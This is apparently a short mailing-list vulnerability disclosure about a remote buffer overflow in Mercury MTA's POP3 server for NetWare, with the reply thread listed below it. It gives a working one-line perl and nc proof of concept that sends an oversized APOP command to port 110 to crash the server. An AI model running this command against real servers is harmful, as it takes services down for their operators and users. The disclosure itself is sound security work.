Hello, All versions of widely-used POP3 server from Mercury MTA package for Netware are vulnerable to remote buffer overflow allowing to crash Netware server: perl -e 'print "APOP " . "a"x2048 . " " . "a"x2048 . "\r\n"' | nc host 110 Remote execution of malicious code is also theoretically possible. -- * Fido: 2:480/124 ** WWW: http://www.frasunek.com/ ** NIC-HDL: PMF9-RIPE * * Inet: [EMAIL PROTECTED] ** PGP: D48684904685DF43EA93AFA13BE170BF *
- Re: Mercury for NetWare POP3 server vulnerable to remo... Przemyslaw Frasunek
- Re: Mercury for NetWare POP3 server vulnerable to... Przemyslaw Frasunek
- Re: Mercury for NetWare POP3 server vulnerabl... Atro Tossavainen
- Re: Mercury for NetWare POP3 server vulne... Przemyslaw Frasunek
- Re: Mercury for NetWare POP3 server vulnerable to... Adam Osuchowski
